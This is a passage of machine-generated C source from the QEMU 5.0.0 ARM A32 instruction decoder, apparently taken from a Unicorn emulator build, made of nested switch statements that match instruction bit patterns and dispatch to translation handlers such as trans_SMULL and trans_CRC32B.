(trans_LDRD_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100000: /* ....0000 .001.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:261 */ if (trans_LDRSB_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x3: /* ....0000 .00..... ........ 1111.... */ disas_a32_extract_ldst_rr_pw0(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00000000: /* ....0000 .000.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:255 */ if (trans_STRD_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100000: /* ....0000 .001.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:264 */ if (trans_LDRSH_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; } return false; case 0x00200000: /* ....0000 .01..... ........ 0..1.... */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 001..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:93 */ if (trans_EOR_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* ....0000 101..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:97 */ if (trans_ADC_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x00200080: /* ....0000 .01..... ........ 1..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0000 .01..... ........ 1001.... */ disas_a32_extract_s_rdamn(ctx, &u.f_s_rrrr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 001..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:145 */ if (trans_MLA(ctx, &u.f_s_rrrr)) return true; return false; case 0x1: /* ....0000 101..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:149 */ if (trans_UMLAL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 .01..... ........ 1011.... */ disas_a32_extract_ldst_rr_p0w1(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00000000: /* ....0000 .010.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:272 */ if (trans_STRHT_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00100000: /* ....0000 .011.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:273 */ if (trans_LDRHT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x2: /* ....0000 .01..... ........ 1101.... */ disas_a32_extract_ldst_rr_p0w1(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00100000: /* ....0000 .011.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:274 */ if (trans_LDRSBT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x3: /* ....0000 .01..... ........ 1111.... */ disas_a32_extract_ldst_rr_p0w1(ctx, &u.f_ldst_rr, insn); switch (insn & 0x00100f00) { case 0x00100000: /* ....0000 .011.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:275 */ if (trans_LDRSHT_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; } return false; case 0x00400000: /* ....0000 .10..... ........ 0..1.... */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 010..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:94 */ if (trans_SUB_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* ....0000 110..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:98 */ if (trans_SBC_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x00400080: /* ....0000 .10..... ........ 1..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0000 .10..... ........ 1001.... */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 010..... ........ 1001.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 0100.... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:146 */ if (trans_UMAAL(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 110..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:150 */ disas_a32_extract_s_rdamn(ctx, &u.f_s_rrrr, insn); if (trans_SMULL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 .10..... ........ 1011.... */ disas_a32_extract_ldst_ri8_pw0(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 .100.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:310 */ if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0000 .101.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:319 */ if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x2: /* ....0000 .10..... ........ 1101.... */ disas_a32_extract_ldst_ri8_pw0(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 .100.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:313 */ if (trans_LDRD_ri_a32(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0000 .101.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:322 */ if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x3: /* ....0000 .10..... ........ 1111.... */ disas_a32_extract_ldst_ri8_pw0(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 .100.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:316 */ if (trans_STRD_ri_a32(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0000 .101.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:325 */ if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; } return false; case 0x00600000: /* ....0000 .11..... ........ 0..1.... */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 011..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:95 */ if (trans_RSB_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* ....0000 111..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:99 */ if (trans_RSC_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x00600080: /* ....0000 .11..... ........ 1..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0000 .11..... ........ 1001.... */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....0000 011..... ........ 1001.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 0110.... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:147 */ if (trans_MLS(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 111..... ........ 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:151 */ disas_a32_extract_s_rdamn(ctx, &u.f_s_rrrr, insn); if (trans_SMLAL(ctx, &u.f_s_rrrr)) return true; return false; } return false; case 0x1: /* ....0000 .11..... ........ 1011.... */ disas_a32_extract_ldst_ri8_p0w1(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* ....0000 .110.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:333 */ if (trans_STRHT_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* ....0000 .111.... ........ 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:334 */ if (trans_LDRHT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x2: /* ....0000 .11..... ........ 1101.... */ disas_a32_extract_ldst_ri8_p0w1(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x1: /* ....0000 .111.... ........ 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:335 */ if (trans_LDRSBT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x3: /* ....0000 .11..... ........ 1111.... */ disas_a32_extract_ldst_ri8_p0w1(ctx, &u.f_ldst_ri, insn); switch ((insn >> 20) & 0x1) { case 0x1: /* ....0000 .111.... ........ 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:336 */ if (trans_LDRSHT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; } return false; } return false; case 0x01000000: /* ....0001 ........ ........ ...0.... */ switch (insn & 0x00a00000) { case 0x00000000: /* ....0001 0.0..... ........ ...0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0.00.... ........ ...0.... */ switch ((insn >> 5) & 0x7) { case 0x0: /* ....0001 0.00.... ........ 0000.... */ switch (insn & 0x00000e0f) { case 0x00000000: /* ....0001 0.00.... ....000. 00000000 */ disas_a32_extract_disas_a32_Fmt_22(ctx, &u.f_mrs_reg, insn); switch (insn & 0x000f0100) { case 0x000f0000: /* ....0001 0.001111 ....0000 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:226 */ if (trans_MRS_reg(ctx, &u.f_mrs_reg)) return true; return false; } return false; case 0x00000200: /* ....0001 0.00.... ....001. 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:223 */ disas_a32_extract_disas_a32_Fmt_20(ctx, &u.f_mrs_bank, insn); if (trans_MRS_bank(ctx, &u.f_mrs_bank)) return true; return false; } return false; case 0x2: /* ....0001 0.00.... ........ 0100.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00400f00) { case 0x00000000: /* ....0001 0000.... ....0000 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:207 */ if (trans_CRC32B(ctx, &u.f_rrr)) return true; return false; case 0x00000200: /* ....0001 0000.... ....0010 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:210 */ if (trans_CRC32CB(ctx, &u.f_rrr)) return true; return false; case 0x00400000: /* ....0001 0100.... ....0000 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:209 */ if (trans_CRC32W(ctx, &u.f_rrr)) return true; return false; case 0x00400200: /* ....0001 0100.... ....0010 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:212 */ if (trans_CRC32CW(ctx, &u.f_rrr)) return true; return false; } return false; case 0x4: /* ....0001 0.00.... ........ 1000.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0000.... ........ 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:164 */ if (trans_SMLABB(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0100.... ........ 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:172 */ if (trans_SMLALBB(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x5: /* ....0001 0.00.... ........ 1010.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0000.... ........ 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:166 */ if (trans_SMLATB(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0100.... ........ 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:174 */ if (trans_SMLALTB(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x6: /* ....0001 0.00.... ........ 1100.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0000.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:165 */ if (trans_SMLABT(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0100.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:173 */ if (trans_SMLALBT(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x7: /* ....0001 0.00.... ........ 1110.... */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0000.... ........ 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:167 */ if (trans_SMLATT(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0100.... ........ 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:175 */ if (trans_SMLALTT(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; case 0x1: /* ....0001 0.01.... ........ ...0.... */ disas_a32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); switch (insn & 0x0040f000) { case 0x00000000: /* ....0001 0001.... 0000.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:68 */ if (trans_TST_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00400000: /* ....0001 0101.... 0000.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:70 */ if (trans_CMP_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; } return false; case 0x00200000: /* ....0001 0.1..... ........ ...0.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0.10.... ........ ...0.... */ switch ((insn >> 5) & 0x7) { case 0x0: /* ....0001 0.10.... ........ 0000.... */ switch ((insn >> 9) & 0x7f) { case 0x78: /* ....0001 0.10.... 1111000. 0000.... */ disas_a32_extract_disas_a32_Fmt_23(ctx, &u.f_msr_reg, insn); switch ((insn >> 8) & 0x1) { case 0x0: /* ....0001 0.10.... 11110000 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:227 */ if (trans_MSR_reg(ctx, &u.f_msr_reg)) return true; return false; } return false; case 0x79: /* ....0001 0.10.... 1111001. 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:224 */ disas_a32_extract_disas_a32_Fmt_21(ctx, &u.f_msr_bank, insn); if (trans_MSR_bank(ctx, &u.f_msr_bank)) return true; return false; } return false; case 0x1: /* ....0001 0.10.... ........ 0010.... */ disas_a32_extract_rm(ctx, &u.f_r, insn); switch (insn & 0x004fff00) { case 0x000fff00: /* ....0001 00101111 11111111 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:230 */ if (trans_BXJ(ctx, &u.f_r)) return true; return false; } return false; case 0x2: /* ....0001 0.10.... ........ 0100.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00400f00) { case 0x00000000: /* ....0001 0010.... ....0000 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:208 */ if (trans_CRC32H(ctx, &u.f_rrr)) return true; return false; case 0x00000200: /* ....0001 0010.... ....0010 0100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:211 */ if (trans_CRC32CH(ctx, &u.f_rrr)) return true; return false; } return false; case 0x3: /* ....0001 0.10.... ........ 0110.... */ disas_a32_extract_disas_a32_Fmt_16(ctx, &u.f_empty, insn); switch (insn & 0x004fff0f) { case 0x0040000e: /* ....0001 01100000 00000000 01101110 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:235 */ if (trans_ERET(ctx, &u.f_empty)) return true; return false; } return false; case 0x4: /* ....0001 0.10.... ........ 1000.... */ switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0010.... ........ 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:168 */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); if (trans_SMLAWB(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0110.... ........ 1000.... */ disas_a32_extract_rd0mn(ctx, &u.f_rrrr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0110.... 0000.... 1000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:176 */ if (trans_SMULBB(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; case 0x5: /* ....0001 0.10.... ........ 1010.... */ disas_a32_extract_rd0mn(ctx, &u.f_rrrr, insn); switch (insn & 0x0040f000) { case 0x00000000: /* ....0001 0010.... 0000.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:169 */ if (trans_SMULWB(ctx, &u.f_rrrr)) return true; return false; case 0x00400000: /* ....0001 0110.... 0000.... 1010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:178 */ if (trans_SMULTB(ctx, &u.f_rrrr)) return true; return false; } return false; case 0x6: /* ....0001 0.10.... ........ 1100.... */ switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 0010.... ........ 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:170 */ disas_a32_extract_rdamn(ctx, &u.f_rrrr, insn); if (trans_SMLAWT(ctx, &u.f_rrrr)) return true; return false; case 0x1: /* ....0001 0110.... ........ 1100.... */ disas_a32_extract_rd0mn(ctx, &u.f_rrrr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0110.... 0000.... 1100.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:177 */ if (trans_SMULBT(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; case 0x7: /* ....0001 0.10.... ........ 1110.... */ disas_a32_extract_rd0mn(ctx, &u.f_rrrr, insn); switch (insn & 0x0040f000) { case 0x00000000: /* ....0001 0010.... 0000.... 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:171 */ if (trans_SMULWT(ctx, &u.f_rrrr)) return true; return false; case 0x00400000: /* ....0001 0110.... 0000.... 1110.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:179 */ if (trans_SMULTT(ctx, &u.f_rrrr)) return true; return false; } return false; } return false; case 0x1: /* ....0001 0.11.... ........ ...0.... */ disas_a32_extract_S_xrr_shi(ctx, &u.f_s_rrr_shi, insn); switch (insn & 0x0040f000) { case 0x00000000: /* ....0001 0011.... 0000.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:69 */ if (trans_TEQ_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00400000: /* ....0001 0111.... 0000.... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:71 */ if (trans_CMN_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; } return false; case 0x00800000: /* ....0001 1.0..... ........ ...0.... */ disas_a32_extract_s_rrr_shi(ctx, &u.f_s_rrr_shi, insn); switch ((insn >> 22) & 0x1) { case 0x0: /* ....0001 100..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:72 */ if (trans_ORR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* ....0001 110..... ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:74 */ if (trans_BIC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x00a00000: /* ....0001 1.1..... ........ ...0.... */ disas_a32_extract_s_rxr_shi(ctx, &u.f_s_rrr_shi, insn); switch (insn & 0x004f0000) { case 0x00000000: /* ....0001 101.0000 ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:73 */ if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x00400000: /* ....0001 111.0000 ........ ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:75 */ if (trans_MVN_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; } return false; case 0x01000010: /* ....0001 ........ ........ ...1.... */ switch (insn & 0x00400080) { case 0x00000000: /* ....0001 .0...... ........ 0..1.... */ switch (insn & 0x00a00000) { case 0x00000000: /* ....0001 000..... ........ 0..1.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0000.... ........ 0..1.... */ switch ((insn >> 5) & 0x3) { case 0x2: /* ....0001 0000.... ........ 0101.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 8) & 0xf) { case 0x0: /* ....0001 0000.... ....0000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:157 */ if (trans_QADD(ctx, &u.f_rrr)) return true; return false; } return false; case 0x3: /* ....0001 0000.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:237 */ disas_a32_extract_i16(ctx, &u.f_i, insn); if (trans_HLT(ctx, &u.f_i)) return true; return false; } return false; case 0x1: /* ....0001 0001.... ........ 0..1.... */ disas_a32_extract_S_xrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0001.... 0000.... 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:100 */ if (trans_TST_xrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00200000: /* ....0001 001..... ........ 0..1.... */ switch ((insn >> 20) & 0x1) { case 0x0: /* ....0001 0010.... ........ 0..1.... */ switch ((insn >> 5) & 0x3) { case 0x0: /* ....0001 0010.... ........ 0001.... */ disas_a32_extract_rm(ctx, &u.f_r, insn); switch ((insn >> 8) & 0xfff) { case 0xfff: /* ....0001 00101111 11111111 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:229 */ if (trans_BX(ctx, &u.f_r)) return true; return false; } return false; case 0x1: /* ....0001 0010.... ........ 0011.... */ disas_a32_extract_rm(ctx, &u.f_r, insn); switch ((insn >> 8) & 0xfff) { case 0xfff: /* ....0001 00101111 11111111 0011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:231 */ if (trans_BLX_r(ctx, &u.f_r)) return true; return false; } return false; case 0x2: /* ....0001 0010.... ........ 0101.... */ disas_a32_extract_rndm(ctx, &u.f_rrr, insn); switch ((insn >> 8) & 0xf) { case 0x0: /* ....0001 0010.... ....0000 0101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:158 */ if (trans_QSUB(ctx, &u.f_rrr)) return true; return false; } return false; case 0x3: /* ....0001 0010.... ........ 0111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:238 */ disas_a32_extract_i16(ctx, &u.f_i, insn); if (trans_BKPT(ctx, &u.f_i)) return true; return false; } return false; case 0x1: /* ....0001 0011.... ........ 0..1.... */ disas_a32_extract_S_xrr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 12) & 0xf) { case 0x0: /* ....0001 0011.... 0000.... 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:101 */ if (trans_TEQ_xrrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00800000: /* ....0001 100..... ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:104 */ disas_a32_extract_s_rrr_shr(ctx, &u.f_s_rrr_shr, insn); if (trans_ORR_rrrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x00a00000: /* ....0001 101..... ........ 0..1.... */ disas_a32_extract_s_rxr_shr(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 16) & 0xf) { case 0x0: /* ....0001 101.0000 ........ 0..1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:105 */ if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; } return false; case 0x00000080: /* ....0001 .0...... ........ 1..1.... */ switch (insn & 0x00100f60) { case 0x00000000: /* ....0001 .0.0.... ....0000 1001.... */ disas_a32_extract_swp(ctx, &u.f_disas_a3226, insn); switch (insn & 0x00a00000) { case 0x00000000: /* ....0001 0000.... ....0000 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:364 */ if (trans_SWP(ctx, &u.f_disas_a3226)) return true; return false; } return false; case 0x00000020: /* ....0001 .0.0.... ....0000 1011.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:250 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_STRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00000040: /* ....0001 .0.0.... ....0000 1101.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:253 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_LDRD_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00000060: /* ....0001 .0.0.... ....0000 1111.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:256 */ disas_a32_extract_ldst_rr_p1w(ctx, &u.f_ldst_rr, insn); if (trans_STRD_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x00000c00: /* ....0001 .0.0.... ....1100 1001.... */ disas_a32_extract_stl(ctx, &u.f_ldrex, insn); switch (insn & 0x00a0f000) { case 0x0080f000: /* ....0001 1000.... 11111100 1001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/a32.decode:388 */ if (trans_STL(ctx, &u.f_ldrex)) return true; return false; } return false; case 0x00000e00: /* ....0001 